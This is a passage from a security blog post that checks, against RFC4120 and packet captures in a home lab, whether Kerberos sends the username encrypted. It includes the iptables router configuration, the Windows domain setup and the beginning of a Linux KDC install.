&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;6. The client installs the TGT for use until it expires.
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;Logically, steps two and three can&amp;rsquo;t co-exist. If the username is encrypted, either it needs to be encrypted with a Pre-shared key (PSK) that is NOT the users password, or a PSK that IS a hash of the users password.&lt;/p&gt;
&lt;p&gt;If the username is encrypted with a hash of the users password, then when it gets to the KDC, the KDC needs to bruteforce this auth attempt with the password for &lt;strong&gt;EVERY&lt;/strong&gt; user in it&amp;rsquo;s database, unless another piece of identifying information is passed with the encrypted username.&lt;/p&gt;
&lt;p&gt;Alternatively, the PSK is NOT based on the users password, but in this case, the AES password needs to be sent to the requesting system across the network in either cleartext, or using something like Diffie Hellman Key Exchange. I&amp;rsquo;ve never read this being the case, nor observed it. Nontheless, we allow for this in our testing environment.&lt;/p&gt;
&lt;h2 id=&#34;process&#34;&gt;Process
&lt;/h2&gt;&lt;p&gt;On to the research! First, I like to start with a problem statement, which is effectively &amp;ldquo;What am I trying to prove / disprove&amp;rdquo;. In this example, my problem statement read:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The listed Kerberos logon process, step 2: 2. The client encrypts the username with AES for transmission to the KDC (as taken from CISSP Official study guide, Sybex, 8e, p. 604; Chapple, M. Stewart, JM. &amp;amp; Gibson, D.) is incorrect.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;Now I&amp;rsquo;m generally looking for three investigative avenues I try and persue independently of each other, whenever possible:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Does the assertion pass the sniff test?&lt;/li&gt;
&lt;li&gt;How does the documentation say it should work?&lt;/li&gt;
&lt;li&gt;How does it actually work?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We&amp;rsquo;ve already documented one above. It doesn&amp;rsquo;t pass the sniff test (ie, it can&amp;rsquo;t work that way) because of the intense burden it would place on kerberos servers with many users.&lt;/p&gt;
&lt;p&gt;For two, we dive into the RFC, or request for comments. This is a document that is effectively where a bunch of very smart people get together and agree on how a given system / protocol / other should work by design. In this particular case, &lt;a class=&#34;link&#34; href=&#34;https://tools.ietf.org/html/rfc4120#section-3.1.1&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;RFC4120&lt;/a&gt; states:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In the request, the client sends (in cleartext) its own identity and
the identity of the server for which it is requesting credentials,
other information about the credentials it is requesting, and a
randomly generated nonce, which can be used to detect replays and to
associate replies with the matching requests.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;Happy days! This reads to me that, at least by design, the username should not be encrypted when it&amp;rsquo;s shipped to the server. Better, this isn&amp;rsquo;t because there&amp;rsquo;s an omission of specification, it explicitly calls out &amp;ldquo;in cleartext&amp;rdquo;. No ambiguity here! Great, this aligns with our sniff test. There&amp;rsquo;s no guarantee that this is how it&amp;rsquo;s been implemented though, so let&amp;rsquo;s move on to point three.&lt;/p&gt;
&lt;p&gt;Sounds like labbing time! When I&amp;rsquo;m doing this research, I&amp;rsquo;ll record and report how the lab is built and justification, so that people reviewing my work in the future can replicate it should they so desire.&lt;/p&gt;
&lt;h3 id=&#34;lab-setup&#34;&gt;Lab Setup
&lt;/h3&gt;&lt;h4 id=&#34;the-network&#34;&gt;The Network
&lt;/h4&gt;&lt;p&gt;Here&amp;rsquo;s a high level view of the network I set up in two seperate testing instances (which is why the IP addresses overlap)&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/lab.png&#34;
	width=&#34;969&#34;
	height=&#34;418&#34;
	srcset=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/lab_hu_f50c24627359658d.png 480w, https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/lab_hu_8aafca2fef70af4f.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Kerberos lab network overview&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;231&#34;
		data-flex-basis=&#34;556px&#34;
	
&gt;&lt;/p&gt;
&lt;h4 id=&#34;router&#34;&gt;Router
&lt;/h4&gt;&lt;p&gt;This machine was set up to emulate a stupid network tap. It hasn&amp;rsquo;t been added to any domain, and has no contextual awareness of the hosts on either side. &lt;strong&gt;IF&lt;/strong&gt; this machine can see credentials passing over the network in plaintext, then we know that PSK passing for AES can&amp;rsquo;t be in place, because if it was, this machine wouldn&amp;rsquo;t know what it was, OR tcpdump wouldn&amp;rsquo;t apply it automatically.&lt;/p&gt;
&lt;p&gt;Router was set up following &lt;a class=&#34;link&#34; href=&#34;https://www.ascinc.com/blog/linux/how-to-build-a-simple-router-with-ubuntu-server-18-04-1-lts-bionic-beaver/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;this process&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;iptables was configured with the below settings:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt; 1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 6
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 7
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 8
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 9
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;10
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;11
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;12
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;13
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;14
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;15
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;16
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;17
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;18
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;19
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;20
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;21
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;22
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;23
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;24
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;25
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;26
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;27
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;28
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;cp&#34;&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;cp&#34;&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# /etc/rc.local&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# Default policy to drop all incoming packets.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;iptables -P INPUT DROP
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;iptables -P FORWARD DROP
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# Accept incoming packets from localhost and the LAN interface.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;iptables -A INPUT -i lo -j ACCEPT
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;iptables -A INPUT -i ens34 -j ACCEPT
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# Accept incoming packets from the WAN if the router initiated the connection.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;iptables -A INPUT -i ens35 -m conntrack &lt;span class=&#34;se&#34;&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;se&#34;&gt;&lt;/span&gt;--ctstate ESTABLISHED,RELATED -j ACCEPT
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# Forward LAN packets to the WAN.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;iptables -A FORWARD -i ens34 -o ens35 -j ACCEPT
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# Forward WAN packets to the LAN if the LAN initiated the connection.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;iptables -A FORWARD -i ens35 -o ens34 -m conntrack &lt;span class=&#34;se&#34;&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;se&#34;&gt;&lt;/span&gt;--ctstate ESTABLISHED,RELATED -j ACCEPT
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# NAT traffic going out the WAN interface.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# rc.local needs to exit with 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;nb&#34;&gt;exit&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;Here&amp;rsquo;s a complete view of the host&amp;rsquo;s network interfaces post configuration:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt; 1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 6
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 7
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 8
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 9
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;10
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;11
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;12
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;13
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;14
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;15
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;16
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;17
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;18
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;19
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;20
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;21
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;22
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;23
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;24
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;25
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;deloril@ubuntu:~$ ip address
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    inet 127.0.0.1/8 scope host lo
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;       valid_lft forever preferred_lft forever
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    inet6 ::1/128 scope host 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;       valid_lft forever preferred_lft forever
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;2: ens33: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    link/ether 00:50:56:28:f5:01 brd ff:ff:ff:ff:ff:ff
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    inet 172.16.68.129/24 brd 172.16.68.255 scope global dynamic noprefixroute ens33
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;       valid_lft 1732sec preferred_lft 1732sec
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    inet6 fe80::f34e:6be1:573c:7e38/64 scope link noprefixroute 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;       valid_lft forever preferred_lft forever
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3: ens34: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    link/ether 00:50:56:30:10:02 brd ff:ff:ff:ff:ff:ff
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    inet 10.0.0.9/24 brd 10.0.0.255 scope global noprefixroute ens34
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;       valid_lft forever preferred_lft forever
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    inet6 fe80::20e1:c419:da20:3547/64 scope link noprefixroute 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;       valid_lft forever preferred_lft forever
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;4: ens35: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    link/ether 00:50:56:27:db:03 brd ff:ff:ff:ff:ff:ff
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    inet 10.1.1.4/24 brd 10.1.1.255 scope global noprefixroute ens35
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;       valid_lft forever preferred_lft forever
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    inet6 fe80::f57b:5f31:8c5e:87e3/64 scope link noprefixroute 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;       valid_lft forever preferred_lft forever
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;Finally, for each test, tcpdump was executed with this command: &lt;code&gt;tcpdump -i ens35 -w ~/&amp;lt;relevant pcap name&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;h4 id=&#34;windows&#34;&gt;Windows
&lt;/h4&gt;&lt;h5 id=&#34;server-setup&#34;&gt;Server Setup
&lt;/h5&gt;&lt;p&gt;Use Server Manager to add the Role &amp;ldquo;Active Directory Domain Services&amp;rdquo; and dependencies only. Promote server to domain controller, creating a new forest called mydomain.hidden Accept forest and domain functional lecels of Windows Server 2016 Password: Accept netbios name of mydomain&lt;/p&gt;
&lt;p&gt;Once installed and rebooted, create a user called plaintextusername. Add this user to domain administrators, because we&amp;rsquo;re lazy and don&amp;rsquo;t want hiccups.&lt;/p&gt;
&lt;h5 id=&#34;client-setup&#34;&gt;Client Setup
&lt;/h5&gt;&lt;p&gt;Join to the domain, prior to logging packets. This is because when I didn&amp;rsquo;t, NTLM authentication was used, and I hadn&amp;rsquo;t the time to work out how to force kerberos.&lt;/p&gt;
&lt;p&gt;Restart machine.&lt;/p&gt;
&lt;h5 id=&#34;windows-test&#34;&gt;Windows Test
&lt;/h5&gt;&lt;p&gt;On the client, attempt to authenticate as &lt;code&gt;mydomain\plaintextusername&lt;/code&gt; and &lt;code&gt;mydomain\unknownuser&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For the known user test, we&amp;rsquo;re attempting to authenticate with a valid credential. If you want to follow along, the &lt;a class=&#34;link&#34; href=&#34;windows-knownuser.pcap&#34; &gt;pcap is here&lt;/a&gt;. To generate this traffic, we had the client booted up, and attempted to sign in to the machine with the correct credentials for &lt;code&gt;mydomain\plaintextusername&lt;/code&gt;. As shown below the CNameString plaintextusername and the realm mydomain are being passed across the network in clear text in packet 4.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/windows-knownuser.png&#34;
	width=&#34;611&#34;
	height=&#34;574&#34;
	srcset=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/windows-knownuser_hu_1bbbb2da999fdb86.png 480w, https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/windows-knownuser_hu_15a51507d90932d2.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Packet 4 of windows-knownuser.pcap&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;106&#34;
		data-flex-basis=&#34;255px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;For the unknown user test, we&amp;rsquo;re attempting to authenticate with an invalid username (this user doesn&amp;rsquo;t exist in the domain). If you want to follow along, the &lt;a class=&#34;link&#34; href=&#34;windows-unknownuser.pcap&#34; &gt;pcap is here&lt;/a&gt;. To generate this traffic, we had the client booted up, and attempted to sign in to the machine with the invalid username &lt;code&gt;mydomain\unknownuser&lt;/code&gt;. As shown below the CNameString unknownuser and the realm mydomain are being passed across the network in clear text in packet 4.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/windows-unknownuser.png&#34;
	width=&#34;610&#34;
	height=&#34;579&#34;
	srcset=&#34;https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/windows-unknownuser_hu_78d55c4d9b462845.png 480w, https://thisinsecureworld.com/p/kerberos-errata-submission-research-process/windows-unknownuser_hu_5379c0a49670c5ec.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Packet 4 of windows-knownuser.pcap&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;105&#34;
		data-flex-basis=&#34;252px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;This looks pretty great, right? Our sniff test is appears correct, and it looks like the windows configuration I&amp;rsquo;ve tested is RFC compliant! But what about Linux?! I hate being adamantly wrong, so best to cover our bases.&lt;/p&gt;
&lt;h4 id=&#34;linux&#34;&gt;Linux
&lt;/h4&gt;&lt;h5 id=&#34;server-setup-1&#34;&gt;Server Setup
&lt;/h5&gt;&lt;p&gt;I followed &lt;a class=&#34;link&#34; href=&#34;https://help.ubuntu.com/lts/serverguide/kerberos.html&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;this guide&lt;/a&gt;, running the below commands (relevant output is recorded too, because I&amp;rsquo;m fancy like that)&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt; 1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 6
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 7
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 8
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 9
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;10
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;11
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;12
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;13
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;14
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;15
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;16
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;17
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;18
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;19
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;20
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;21
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;22
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;23
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;24
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;25
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;26
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;27
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;28
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;29
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;30
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;31
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;sudo apt install krb5-kdc krb5-admin-server
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Realm: myrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Kerberos Server: 127.0.0.1
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;AS: 127.0.0.1
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;sudo krb5_newrealm
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Password: &amp;lt;redacted&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;sudo dpkg-reconfigure krb5-kdc
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;sudo kadmin.local
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;kadmin.local: addprinc plaintextusername
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Password for user: &amp;lt;redacted&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;quit
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;sudo vim /etc/krb5kdc/kadm5.acl
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;add line 
